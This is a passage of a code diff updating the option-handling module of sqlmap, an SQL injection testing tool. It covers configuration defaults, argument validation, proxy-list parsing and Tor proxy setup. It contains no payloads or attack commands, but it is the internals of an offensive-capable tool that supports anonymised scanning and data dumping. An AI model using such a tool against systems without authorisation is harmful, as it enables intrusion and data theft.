conf.proxy is None: + debugMsg = "using environment proxy '%s'" % envProxy + logger.debug(debugMsg) + + conf.proxy = envProxy + + if any((conf.proxy, conf.proxyFile, conf.tor)): + conf.disablePrecon = True + + if conf.dummy: + conf.batch = True + threadData = getCurrentThreadData() threadData.reset() -def _purgeOutput(): +def _cleanupEnvironment(): + """ + Cleanup environment (e.g. from leftovers after --shell). + """ + + if issubclass(_http_client.socket.socket, socks.socksocket): + socks.unwrapmodule(_http_client) + + if hasattr(socket, "_ready"): + socket._ready.clear() + +def _purge(): """ - Safely removes (purges) output directory. + Safely removes (purges) sqlmap data directory. 
""" - if conf.purgeOutput: - purge(paths.SQLMAP_OUTPUT_PATH) + if conf.purge: + purge(paths.SQLMAP_HOME_PATH) def _setConfAttributes(): """ @@ -1454,8 +2021,11 @@ def _setConfAttributes(): conf.dbmsHandler = None conf.dnsServer = None conf.dumpPath = None + conf.fileWriteType = None + conf.HARCollectorFactory = None conf.hashDB = None conf.hashDBFile = None + conf.httpCollector = None conf.httpHeaders = [] conf.hostname = None conf.ipv6 = False @@ -1465,12 +2035,12 @@ def _setConfAttributes(): conf.parameters = {} conf.path = None conf.port = None - conf.resultsFilename = None + conf.proxyList = None conf.resultsFP = None conf.scheme = None conf.tests = [] + conf.tempDirs = [] conf.trafficFP = None - conf.wFileType = None def _setKnowledgeBaseAttributes(flushAll=True): """ @@ -1484,80 +2054,122 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.absFilePaths = set() kb.adjustTimeDelay = None kb.alerted = False + kb.aliasName = randomStr() kb.alwaysRefresh = None kb.arch = None kb.authHeader = None kb.bannerFp = AttribDict() + kb.base64Originals = {} + kb.binaryField = False + kb.browserVerification = None kb.brute = AttribDict({"tables": [], "columns": []}) kb.bruteMode = False kb.cache = AttribDict() - kb.cache.content = {} + kb.cache.addrinfo = {} + kb.cache.content = LRUDict(capacity=16) + kb.cache.comparison = {} + kb.cache.encoding = LRUDict(capacity=256) + kb.cache.alphaBoundaries = None + kb.cache.hashRegex = None + kb.cache.intBoundaries = None + kb.cache.parsedDbms = {} kb.cache.regex = {} kb.cache.stdev = {} + kb.captchaDetected = None + kb.chars = AttribDict() kb.chars.delimiter = randomStr(length=6, lowercase=True) - kb.chars.start = ":%s:" % randomStr(length=3, lowercase=True) - kb.chars.stop = ":%s:" % randomStr(length=3, lowercase=True) - kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = (":%s:" % _ for _ in randomStr(length=4, lowercase=True)) + kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR) + kb.chars.stop = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR) + kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = ("%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, _, KB_CHARS_BOUNDARY_CHAR) for _ in randomStr(length=4, lowercase=True)) + kb.choices = AttribDict(keycheck=False) + kb.codePage = None kb.commonOutputs = None + kb.connErrorCounter = 0 + kb.copyExecTest = None kb.counters = {} + kb.customInjectionMark = CUSTOM_INJECTION_MARK_CHAR kb.data = AttribDict() kb.dataOutputFlag = False # Active back-end DBMS fingerprint kb.dbms = None + kb.dbmsFilter = [] kb.dbmsVersion = [UNKNOWN_DBMS_VERSION] kb.delayCandidates = TIME_DELAY_CANDIDATES * [0] kb.dep = None + kb.disableHtmlDecoding = False + kb.disableShiftTable = False kb.dnsMode = False kb.dnsTest = None kb.docRoot = None + kb.droppingRequests = False + kb.dumpColumns = None kb.dumpTable = None + kb.dumpKeyboardInterrupt = False kb.dynamicMarkings = [] kb.dynamicParameter = False kb.endDetection = False kb.explicitSettings = set() + kb.extendTests = None + kb.errorChunkLength = None kb.errorIsNone = True + kb.falsePositives = [] kb.fileReadMode = False + kb.fingerprinted = False + kb.followSitemapRecursion = None kb.forcedDbms = None + kb.forcePartialUnion = False + kb.forceThreads = None + kb.forceWhere = None + kb.forkNote = None + kb.futileUnion = None + kb.fuzzUnionTest = None + kb.heavilyDynamic = False + kb.headersFile = None kb.headersFp = 
{} kb.heuristicDbms = None + kb.heuristicExtendedDbms = None + kb.heuristicCode = None + kb.heuristicMode = False + kb.heuristicPage = False kb.heuristicTest = None - kb.hintValue = None + kb.hintValue = "" kb.htmlFp = [] kb.httpErrorCodes = {} kb.inferenceMode = False kb.ignoreCasted = None kb.ignoreNotFound = False kb.ignoreTimeout = False + kb.identifiedWafs = set() kb.injection = InjectionDict() kb.injections = [] + kb.jsonAggMode = False + kb.laggingChecked = False kb.lastParserStatus = None kb.locks = AttribDict() - for _ in ("cache", "count", "index", "io", "limit", "log", "redirect", "request", "value"): + for _ in ("cache", "connError", "count", "handlers", "hint", "identYwaf", "index", "io", "limit", "liveCookies", "log", "socket", "redirect", "request", "value"): kb.locks[_] = threading.Lock() kb.matchRatio = None kb.maxConnectionsFlag = False kb.mergeCookies = None kb.multiThreadMode = False + kb.multipleCtrlC = False kb.negativeLogic = False + kb.nchar = True kb.nullConnection = None - kb.pageCompress = True - kb.pageTemplate = None - kb.pageTemplates = dict() - kb.postHint = None - kb.previousMethod = None - kb.processUserMarks = None + kb.oldMsf = None kb.orderByColumns = None kb.originalCode = None kb.originalPage = None + kb.originalPageTime = None kb.originalTimeDelay = None kb.originalUrls = dict() @@ -1567,49 +2179,82 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.osVersion = None kb.osSP = None + kb.pageCompress = True + kb.pageTemplate = None + kb.pageTemplates = dict() kb.pageEncoding = DEFAULT_PAGE_ENCODING kb.pageStable = None kb.partRun = None kb.permissionFlag = False + kb.place = None + kb.postHint = None + kb.postSpaceToPlus = False + kb.postUrlEncode = True kb.prependFlag = False kb.processResponseCounter = 0 + kb.previousMethod = None + kb.processNonCustom = None + kb.processUserMarks = None + kb.proxies = None kb.proxyAuthHeader = None kb.queryCounter = 0 - kb.redirectChoice = None - kb.redirectSetCookie = None + kb.randomPool = {} kb.reflectiveMechanism = True kb.reflectiveCounters = {REFLECTIVE_COUNTER.MISS: 0, REFLECTIVE_COUNTER.HIT: 0} kb.requestCounter = 0 kb.resendPostOnRedirect = None - kb.responseTimes = [] + kb.resolutionDbms = None + kb.responseTimes = {} + kb.responseTimeMode = None + kb.responseTimePayload = None kb.resumeValues = True kb.safeCharEncode = False + kb.safeReq = AttribDict() + kb.secondReq = None + kb.serverHeader = None kb.singleLogFlags = set() - kb.skipOthersDbms = None - kb.postSpaceToPlus = False + kb.skipSeqMatcher = False + kb.smokeMode = False + kb.reduceTests = None + kb.sslSuccess = False + kb.startTime = time.time() kb.stickyDBMS = False - kb.stickyLevel = None kb.suppressResumeInfo = False + kb.tableFrom = None kb.technique = None + kb.tempDir = None kb.testMode = False + kb.testOnlyCustom = False kb.testQueryCount = 0 + kb.testType = None kb.threadContinue = True kb.threadException = False - kb.timeValidCharsRun = 0 kb.uChar = NULL + kb.udfFail = False kb.unionDuplicates = False + kb.unionTemplate = None + kb.webSocketRecvCount = None + kb.wizardMode = False kb.xpCmdshellAvailable = False if flushAll: + kb.checkSitemap = None kb.headerPaths = {} kb.keywords = set(getFileItems(paths.SQL_KEYWORDS)) + kb.lastCtrlCTime = None + kb.normalizeCrawlingChoice = None kb.passwordMgr = None + kb.postprocessFunctions = [] + kb.preprocessFunctions = [] + kb.skipVulnHost = None + kb.storeCrawlingChoice = None kb.tamperFunctions = [] - kb.targets = oset() + kb.targets = OrderedSet() kb.testedParams = set() kb.userAgents = None 
kb.vainRun = True kb.vulnHosts = set() + kb.wafFunctions = [] kb.wordlists = None def _useWizardInterface(): @@ -1622,25 +2267,20 @@ def _useWizardInterface(): logger.info("starting wizard interface") - while True: - while not conf.url: - message = "Please enter full target URL (-u): " - conf.url = readInput(message, default=None) - - message = "POST data (--data) [Enter for None]: " - conf.data = readInput(message, default=None) + while not conf.url: + message = "Please enter full target URL (-u): " + conf.url = readInput(message, default=None, checkBatch=False) - if filter(lambda x: '=' in str(x), [conf.url, conf.data]) or '*' in conf.url: - break - else: - warnMsg = "no GET and/or POST parameter(s) found for testing " - warnMsg += "(e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')" - logger.critical(warnMsg) + message = "%s data (--data) [Enter for None]: " % ((conf.method if conf.method != HTTPMETHOD.GET else None) or HTTPMETHOD.POST) + conf.data = readInput(message, default=None) - if conf.crawlDepth or conf.forms: - break - else: - conf.url = conf.data = None + if not (any('=' in _ for _ in (conf.url, conf.data)) or '*' in conf.url): + warnMsg = "no GET and/or %s parameter(s) found for testing " % ((conf.method if conf.method != HTTPMETHOD.GET else None) or HTTPMETHOD.POST) + warnMsg += "(e.g. GET parameter 'id' in 'http://www.site.com/vuln.php?id=1'). " + if not conf.crawlDepth and not conf.forms: + warnMsg += "Will search for forms" + conf.forms = True + logger.warning(warnMsg) choice = None @@ -1664,15 +2304,18 @@ def _useWizardInterface(): while choice is None or choice not in ("", "1", "2", "3"): message = "Enumeration (--banner/--current-user/etc). Please choose:\n" - message += "[1] Basic (default)\n[2] Smart\n[3] All" + message += "[1] Basic (default)\n[2] Intermediate\n[3] All" choice = readInput(message, default='1') if choice == '2': - map(lambda x: conf.__setitem__(x, True), WIZARD.SMART) + options = WIZARD.INTERMEDIATE elif choice == '3': - map(lambda x: conf.__setitem__(x, True), WIZARD.ALL) + options = WIZARD.ALL else: - map(lambda x: conf.__setitem__(x, True), WIZARD.BASIC) + options = WIZARD.BASIC + + for _ in options: + conf.__setitem__(_, True) logger.debug("muting sqlmap.. it will do the magic for you") conf.verbose = 0 @@ -1682,60 +2325,23 @@ def _useWizardInterface(): dataToStdout("\nsqlmap is running, please wait..\n\n") -def _saveCmdline(): + kb.wizardMode = True + +def _saveConfig(): """ - Saves the command line options on a sqlmap configuration INI file + Saves the command line options to a sqlmap configuration INI file Format. 
""" - if not conf.saveCmdline: + if not conf.saveConfig: return - debugMsg = "saving command line options on a sqlmap configuration INI file" + debugMsg = "saving command line options to a sqlmap configuration INI file" logger.debug(debugMsg) - config = UnicodeRawConfigParser() - userOpts = {} - - for family in optDict.keys(): - userOpts[family] = [] - - for option, value in conf.items(): - for family, optionData in optDict.items(): - if option in optionData: - userOpts[family].append((option, value, optionData[option])) - - for family, optionData in userOpts.items(): - config.add_section(family) - - optionData.sort() - - for option, value, datatype in optionData: - if datatype and isListLike(datatype): - datatype = datatype[0] + saveConfig(conf, conf.saveConfig) - if value is None: - if datatype == "boolean": - value = "False" - elif datatype in ("integer", "float"): - if option in ("threads", "verbose"): - value = "1" - elif option == "timeout": - value = "10" - else: - value = "0" - elif datatype == "string": - value = "" - - if isinstance(value, basestring): - value = value.replace("\n", "\n ") - - config.set(family, option, value) - - confFP = openFile(paths.SQLMAP_CONFIG, "wb") - config.write(confFP) - - infoMsg = "saved command line options on '%s' configuration file" % paths.SQLMAP_CONFIG + infoMsg = "saved command line options to the configuration file '%s'" % conf.saveConfig logger.info(infoMsg) def setVerbosity(): @@ -1764,6 +2370,43 @@ def setVerbosity(): elif conf.verbose >= 5: logger.setLevel(CUSTOM_LOGGING.TRAFFIC_IN) +def _normalizeOptions(inputOptions): + """ + Sets proper option types + """ + + types_ = {} + for group in optDict.keys(): + types_.update(optDict[group]) + + for key in inputOptions: + if key in types_: + value = inputOptions[key] + if value is None: + continue + + type_ = types_[key] + if type_ and isinstance(type_, tuple): + type_ = type_[0] + + if type_ == OPTION_TYPE.BOOLEAN: + try: + value = bool(value) + except (TypeError, ValueError): + value = False + elif type_ == OPTION_TYPE.INTEGER: + try: + value = int(value) + except (TypeError, ValueError): + value = 0 + elif type_ == OPTION_TYPE.FLOAT: + try: + value = float(value) + except (TypeError, ValueError): + value = 0.0 + + inputOptions[key] = value + def _mergeOptions(inputOptions, overrideOptions): """ Merge command line options with configuration file and default options. 
@@ -1772,9 +2415,6 @@ def _mergeOptions(inputOptions, overrideOptions): @type inputOptions: C{instance} """ - if inputOptions.pickledOptions: - inputOptions = base64unpickle(inputOptions.pickledOptions) - if inputOptions.configFile: configFileParser(inputOptions.configFile) @@ -1787,14 +2427,40 @@ def _mergeOptions(inputOptions, overrideOptions): if key not in conf or value not in (None, False) or overrideOptions: conf[key] = value - for key, value in conf.items(): - if value is not None: - kb.explicitSettings.add(key) + if not conf.api: + for key, value in conf.items(): + if value is not None: + kb.explicitSettings.add(key) for key, value in defaults.items(): if hasattr(conf, key) and conf[key] is None: conf[key] = value + if conf.unstable: + if key in ("timeSec", "retries", "timeout"): + conf[key] *= 2 + + if conf.unstable: + conf.forcePartial = True + + lut = {} + for group in optDict.keys(): + lut.update((_.upper(), _) for _ in optDict[group]) + + envOptions = {} + for key, value in os.environ.items(): + if key.upper().startswith(SQLMAP_ENVIRONMENT_PREFIX): + _ = key[len(SQLMAP_ENVIRONMENT_PREFIX):].upper() + if _ in lut: + envOptions[lut[_]] = value + + if envOptions: + _normalizeOptions(envOptions) + for key, value in envOptions.items(): + conf[key] = value + + mergedOptions.update(conf) + def _setTrafficOutputFP(): if conf.trafficFile: infoMsg = "setting file for logging HTTP traffic" @@ -1802,8 +2468,14 @@ def _setTrafficOutputFP(): conf.trafficFP = openFile(conf.trafficFile, "w+") +def _setupHTTPCollector(): + if not conf.harFile: + return + + conf.httpCollector = HTTPCollectorFactory(conf.harFile).create() + def _setDNSServer(): - if not conf.dnsName: + if not conf.dnsDomain: return infoMsg = "setting up DNS server instance" @@ -1815,9 +2487,9 @@ def _setDNSServer(): try: conf.dnsServer = DNSServer() conf.dnsServer.run() - except socket.error, msg: + except socket.error as ex: errMsg = "there was an error while setting up " - errMsg += "DNS server instance ('%s')" % msg + errMsg += "DNS server instance ('%s')" % getSafeExString(ex) raise SqlmapGenericException(errMsg) else: errMsg = "you need to run sqlmap as an administrator " @@ -1826,6 +2498,15 @@ def _setDNSServer(): errMsg += "for incoming address resolution attempts" raise SqlmapMissingPrivileges(errMsg) +def _setProxyList(): + if not conf.proxyFile: + return + + conf.proxyList = [] + for match in re.finditer(r"(?i)((http[^:]*|socks[^:]*)://)?([\w\-.]+):(\d+)", readCachedFileContent(conf.proxyFile)): + _, type_, address, port = match.groups() + conf.proxyList.append("%s://%s:%s" % (type_ or "http", address, port)) + def _setTorProxySettings(): if not conf.tor: return @@ -1839,50 +2520,65 @@ def _setTorHttpProxySettings(): infoMsg = "setting Tor HTTP proxy settings" logger.info(infoMsg) - found = None - - for port in (DEFAULT_TOR_HTTP_PORTS if not conf.torPort else (conf.torPort,)): - try: - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.connect((LOCALHOST, port)) - found = port - break - except socket.error: - pass - - s.close() + port = findLocalPort(DEFAULT_TOR_HTTP_PORTS if not conf.torPort else (conf.torPort,)) - if found: - conf.proxy = "http://%s:%d" % (LOCALHOST, found) + if port: + conf.proxy = "http://%s:%d" % (LOCALHOST, port) else: - errMsg = "can't establish connection with the Tor proxy. " - errMsg += "Please make sure that you have Vidalia, Privoxy or " - errMsg += "Polipo bundle installed for you to be able to " - errMsg += "successfully use switch '--tor' " - - if IS_WIN: - errMsg += "(e.g. 
https://www.torproject.org/projects/vidalia.html.en)" - else: - errMsg += "(e.g. http://www.coresec.org/2011/04/24/sqlmap-with-tor/)" - + errMsg = "can't establish connection with the Tor HTTP proxy. " + errMsg += "Please make sure that you have Tor (bundle) installed and setup " + errMsg += "so you could be able to successfully use switch '--tor' " raise SqlmapConnectionException(errMsg) if not conf.checkTor: warnMsg = "use switch '--check-tor' at " - warnMsg += "your own convenience when using " - warnMsg += "HTTP proxy type (option '--tor-type') " - warnMsg += "for accessing Tor anonymizing network because of " + warnMsg += "your own convenience when accessing " + warnMsg += "Tor anonymizing network because of " warnMsg += "known issues with default settings of various 'bundles' " warnMsg += "(e.g. Vidalia)" - logger.warn(warnMsg) + logger.warning(warnMsg) def _setTorSocksProxySettings(): infoMsg = "setting Tor SOCKS proxy settings" logger.info(infoMsg) - # Has to be SOCKS5 to prevent DNS leaks (http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29) - socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, LOCALHOST, conf.torPort or DEFAULT_TOR_SOCKS_PORT) - socks.wrapmodule(urllib2) + port = findLocalPort(DEFAULT_TOR_SOCKS_PORTS if not conf.torPort else (conf.torPort,)) + + if not port: + errMsg = "can't establish connection with the Tor SOCKS proxy. " + errMsg += "Please make sure that you have Tor service installed and setup " + errMsg += "so you could be able to successfully use switch '--tor' " + raise SqlmapConnectionException(errMsg) + + # SOCKS5 to prevent DNS leaks (http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29) + socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, LOCALHOST, port) + socks.wrapmodule(_http_client) + +def _setHttpOptions(): + if conf.chunked and conf.data: + if hasattr(_http_client.HTTPConnection, "_set_content_length"): + _http_client.HTTPConnection._set_content_length = lambda self, *args, **kwargs: None + else: + def putheader(self, header, *values): + if header != HTTP_HEADER.CONTENT_LENGTH: + self._putheader(header, *values) + + if not hasattr(_http_client.HTTPConnection, "_putheader"): + _http_client.HTTPConnection._putheader = _http_client.HTTPConnection.putheader + + _http_client.HTTPConnection.putheader = putheader + + if conf.http10: + _http_client.HTTPConnection._http_vsn = 10 + _http_client.HTTPConnection._http_vsn_str = 'HTTP/1.0' + + if conf.url and (conf.url.startswith("ws:/") or conf.url.startswith("wss:/")): + try: + from websocket import ABNF + except ImportError: + errMsg = "sqlmap requires third-party module 'websocket-client' " + errMsg += "in order to use WebSocket functionality" + raise SqlmapMissingDependence(errMsg) def _checkTor(): if not conf.checkTor: @@ -1891,9 +2587,14 @@ def _checkTor(): infoMsg = "checking Tor connection" logger.info(infoMsg) - page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False) - if not page or 'Congratulations' not in page: - errMsg = "it seems that Tor is not properly set. Please try using options '--tor-type' and/or '--tor-port'" + try: + page, _, _ = Request.getPage(url="https://check.torproject.org/api/ip", raise404=False) + tor_status = json.loads(page) + except (SqlmapConnectionException, TypeError, ValueError): + tor_status = None + + if not tor_status or not tor_status.get("IsTor"): + errMsg = "it appears that Tor is not properly set. 
Please try using options '--tor-type' and/or '--tor-port'" raise SqlmapConnectionException(errMsg) else: infoMsg = "Tor is properly being used" @@ -1908,36 +2609,73 @@ def _basicOptionValidation(): errMsg = "value for option '--stop' (limitStop) must be an integer value greater than zero (>0)" raise SqlmapSyntaxException(errMsg) - if conf.level is not None and not (isinstance(conf.level, int) and conf.level > 0): - errMsg = "value for option '--level' must be an integer value greater than zero (>0)" + if conf.level is not None and not (isinstance(conf.level, int) and conf.level >= 1 and conf.level <= 5): + errMsg = "value for option '--level' must be an integer value from range [1, 5]" raise SqlmapSyntaxException(errMsg) - if conf.risk is not None and not (isinstance(conf.risk, int) and conf.risk > 0): - errMsg = "value for option '--risk' must be an integer value greater than zero (>0)" + if conf.risk is not None and not (isinstance(conf.risk, int) and conf.risk >= 1 and conf.risk <= 3): + errMsg = "value for option '--risk' must be an integer value from range [1, 3]" raise SqlmapSyntaxException(errMsg) - if conf.limitStart is not None and isinstance(conf.limitStart, int) and conf.limitStart > 0 and \ - conf.limitStop is not None and isinstance(conf.limitStop, int) and conf.limitStop < conf.limitStart: - errMsg = "value for option '--start' (limitStart) must be smaller or equal than value for --stop (limitStop) option" - raise SqlmapSyntaxException(errMsg) + if isinstance(conf.limitStart, int) and conf.limitStart > 0 and \ + isinstance(conf.limitStop, int) and conf.limitStop < conf.limitStart: + warnMsg = "usage of option '--start' (limitStart) which is bigger than value for --stop (limitStop) option is considered unstable" + logger.warning(warnMsg) - if conf.firstChar is not None and isinstance(conf.firstChar, int) and conf.firstChar > 0 and \ - conf.lastChar is not None and isinstance(conf.lastChar, int) and conf.lastChar < conf.firstChar: + if isinstance(conf.firstChar, int) and conf.firstChar > 0 and \ + isinstance(conf.lastChar, int) and conf.lastChar < conf.firstChar: errMsg = "value for option '--first' (firstChar) must be smaller than or equal to value for --last (lastChar) option" raise SqlmapSyntaxException(errMsg) - if conf.cpuThrottle is not None and isinstance(conf.cpuThrottle, int) and (conf.cpuThrottle > 100 or conf.cpuThrottle < 0): - errMsg = "value for option '--cpu-throttle' (cpuThrottle) must be in range [0,100]" - raise SqlmapSyntaxException(errMsg) + if conf.proxyFile and not any((conf.randomAgent, conf.mobile, conf.agent, conf.requestFile)): + warnMsg = "usage of switch '--random-agent' is strongly recommended when " + warnMsg += "using option '--proxy-file'" + logger.warning(warnMsg) if conf.textOnly and conf.nullConnection: errMsg = "switch '--text-only' is incompatible with switch '--null-connection'" raise SqlmapSyntaxException(errMsg) + if conf.uValues and conf.uChar: + errMsg = "option '--union-values' is incompatible with option '--union-char'" + raise SqlmapSyntaxException(errMsg) + + if conf.base64Parameter and conf.tamper: + errMsg = "option '--base64' is incompatible with option '--tamper'" + raise SqlmapSyntaxException(errMsg) + + if conf.eta and conf.verbose > defaults.verbose: + errMsg = "switch '--eta' is incompatible with option '-v'" + raise SqlmapSyntaxException(errMsg) + + if conf.secondUrl and conf.secondReq: + errMsg = "option '--second-url' is incompatible with option '--second-req')" + raise SqlmapSyntaxException(errMsg) + + if conf.direct and 
conf.url: + errMsg = "option '-d' is incompatible with option '-u' ('--url')" + raise SqlmapSyntaxException(errMsg) + + if conf.direct and conf.dbms: + errMsg = "option '-d' is incompatible with option '--dbms'" + raise SqlmapSyntaxException(errMsg) + if conf.titles and conf.nullConnection: errMsg = "switch '--titles' is incompatible with switch '--null-connection'" raise SqlmapSyntaxException(errMsg) + if conf.dumpTable and conf.search: + errMsg = "switch '--dump' is incompatible with switch '--search'" + raise SqlmapSyntaxException(errMsg) + + if conf.chunked and not any((conf.data, conf.requestFile, conf.forms)): + errMsg = "switch '--chunked' requires usage of (POST) options/switches '--data', '-r' or '--forms'" + raise SqlmapSyntaxException(errMsg) + + if conf.api and not conf.configFile: + errMsg = "switch '--api' requires usage of option '-c'" + raise SqlmapSyntaxException(errMsg) + if conf.data and conf.nullConnection: errMsg = "option '--data' is incompatible with switch '--null-connection'" raise SqlmapSyntaxException(errMsg) @@ -1950,6 +2688,25 @@ def _basicOptionValidation(): errMsg = "option '--not-string' is incompatible with switch '--null-connection'" raise SqlmapSyntaxException(errMsg) + if conf.tor and conf.osPwn: + errMsg = "option '--tor' is incompatible with switch '--os-pwn'" + raise SqlmapSyntaxException(errMsg) + + if conf.noCast and conf.hexConvert: + errMsg = "switch '--no-cast' is incompatible with switch '--hex'" + raise SqlmapSyntaxException(errMsg) + + if conf.crawlDepth: + try: + xrange(conf.crawlDepth) + except OverflowError as ex: + errMsg = "invalid value used for option '--crawl' ('%s')" % getSafeExString(ex) + raise SqlmapSyntaxException(errMsg) + + if conf.dumpAll and conf.search: + errMsg = "switch '--dump-all' is incompatible with switch '--search'" + raise SqlmapSyntaxException(errMsg) + if conf.string and conf.notString: errMsg = "option '--string' is incompatible with switch '--not-string'" raise SqlmapSyntaxException(errMsg) @@ -1958,6 +2715,56 @@ def _basicOptionValidation(): errMsg = "option '--regexp' is incompatible with switch '--null-connection'" raise SqlmapSyntaxException(errMsg) + if conf.regexp: + try: + re.compile(conf.regexp) + except Exception as ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.regexp, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) + + if conf.paramExclude: + if re.search(r"\A\w+,", conf.paramExclude): + conf.paramExclude = r"\A(%s)\Z" % ('|'.join(re.escape(_).strip() for _ in conf.paramExclude.split(','))) + + try: + re.compile(conf.paramExclude) + except Exception as ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.paramExclude, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) + + if conf.retryOn: + try: + re.compile(conf.retryOn) + except Exception as ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.retryOn, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) + + if conf.retries == defaults.retries: + conf.retries = 5 * conf.retries + + warnMsg = "increasing default value for " + warnMsg += "option '--retries' to %d because " % conf.retries + warnMsg += "option '--retry-on' was provided" + logger.warning(warnMsg) + + if conf.cookieDel and len(conf.cookieDel) != 1: + errMsg = "option '--cookie-del' should contain a single character (e.g. 
';')" + raise SqlmapSyntaxException(errMsg) + + if conf.crawlExclude: + try: + re.compile(conf.crawlExclude) + except Exception as ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.crawlExclude, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) + + if conf.scope: + try: + re.compile(conf.scope) + except Exception as ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.scope, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) + if conf.dumpTable and conf.dumpAll: errMsg = "switch '--dump' is incompatible with switch '--dump-all'" raise SqlmapSyntaxException(errMsg) @@ -1966,16 +2773,60 @@ def _basicOptionValidation(): errMsg = "switch '--predict-output' is incompatible with option '--threads' and switch '-o'" raise SqlmapSyntaxException(errMsg) - if conf.threads > MAX_NUMBER_OF_THREADS: + if conf.threads > MAX_NUMBER_OF_THREADS and not conf.get("skipThreadCheck"): errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS raise SqlmapSyntaxException(errMsg) - if conf.forms and not any((conf.url, conf.bulkFile)): - errMsg = "switch '--forms' requires usage of option '-u' (--url) or '-m'" + if conf.forms and not any((conf.url, conf.googleDork, conf.bulkFile)): + errMsg = "switch '--forms' requires usage of option '-u' ('--url'), '-g' or '-m'" + raise SqlmapSyntaxException(errMsg) + + if conf.crawlExclude and not conf.crawlDepth: + errMsg = "option '--crawl-exclude' requires usage of switch '--crawl'" + raise SqlmapSyntaxException(errMsg) + + if conf.safePost and not conf.safeUrl: + errMsg = "option '--safe-post' requires usage of option '--safe-url'" + raise SqlmapSyntaxException(errMsg) + + if conf.safeFreq and not any((conf.safeUrl, conf.safeReqFile)): + errMsg = "option '--safe-freq' requires usage of option '--safe-url' or '--safe-req'" + raise SqlmapSyntaxException(errMsg) + + if conf.safeReqFile and any((conf.safeUrl, conf.safePost)): + errMsg = "option '--safe-req' is incompatible with option '--safe-url' and option '--safe-post'" + raise SqlmapSyntaxException(errMsg) + + if conf.csrfUrl and not conf.csrfToken: + errMsg = "option '--csrf-url' requires usage of option '--csrf-token'" + raise SqlmapSyntaxException(errMsg) + + if conf.csrfMethod and not conf.csrfToken: + errMsg = "option '--csrf-method' requires usage of option '--csrf-token'" + raise SqlmapSyntaxException(errMsg) + + if conf.csrfData and not conf.csrfToken: + errMsg = "option '--csrf-data' requires usage of option '--csrf-token'" + raise SqlmapSyntaxException(errMsg) + + if conf.csrfToken and conf.threads > 1: + errMsg = "option '--csrf-url' is incompatible with option '--threads'" + raise SqlmapSyntaxException(errMsg) + + if conf.requestFile and conf.url and conf.url != DUMMY_URL: + errMsg = "option '-r' is incompatible with option '-u' ('--url')" + raise SqlmapSyntaxException(errMsg) + + if conf.direct and conf.proxy: + errMsg = "option '-d' is incompatible with option '--proxy'" + raise SqlmapSyntaxException(errMsg) + + if conf.direct and conf.tor: + errMsg = "option '-d' is incompatible with switch '--tor'" raise SqlmapSyntaxException(errMsg) - if conf.requestFile and conf.url: - errMsg = "option '-r' is incompatible with option '-u' (--url)" + if not conf.technique: + errMsg = "option '--technique' can't be empty" raise SqlmapSyntaxException(errMsg) if conf.tor and conf.ignoreProxy: @@ -1986,12 +2837,20 @@ def _basicOptionValidation(): errMsg = "switch '--tor' is incompatible with option '--proxy'" raise 
SqlmapSyntaxException(errMsg) + if conf.proxy and conf.proxyFile: + errMsg = "switch '--proxy' is incompatible with option '--proxy-file'" + raise SqlmapSyntaxException(errMsg) + + if conf.proxyFreq and not conf.proxyFile: + errMsg = "option '--proxy-freq' requires usage of option '--proxy-file'" + raise SqlmapSyntaxException(errMsg) + if conf.checkTor and not any((conf.tor, conf.proxy)): - errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address using Tor)" + errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address of Tor service)" raise SqlmapSyntaxException(errMsg) - if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort > 0): - errMsg = "value for option '--tor-port' must be a positive integer" + if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort >= 0 and conf.torPort <= 65535): + errMsg = "value for option '--tor-port' must be in range [0, 65535]" raise SqlmapSyntaxException(errMsg) if conf.torType not in getPublicTypeMembers(PROXY_TYPE, True): @@ -2002,10 +2861,21 @@ def _basicOptionValidation(): errMsg = "option '--dump-format' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(DUMP_FORMAT, True)) raise SqlmapSyntaxException(errMsg) - if conf.skip and conf.testParameter: - errMsg = "option '--skip' is incompatible with option '-p'" + if conf.uValues and (not re.search(r"\A['\w\s.,()%s-]+\Z" % CUSTOM_INJECTION_MARK_CHAR, conf.uValues) or conf.uValues.count(CUSTOM_INJECTION_MARK_CHAR) != 1): + errMsg = "option '--union-values' must contain valid UNION column values, along with the injection position " + errMsg += "(e.g. 'NULL,1,%s,NULL')" % CUSTOM_INJECTION_MARK_CHAR raise SqlmapSyntaxException(errMsg) + if conf.skip and conf.testParameter: + if intersect(conf.skip, conf.testParameter): + errMsg = "option '--skip' is incompatible with option '-p'" + raise SqlmapSyntaxException(errMsg) + + if conf.rParam and 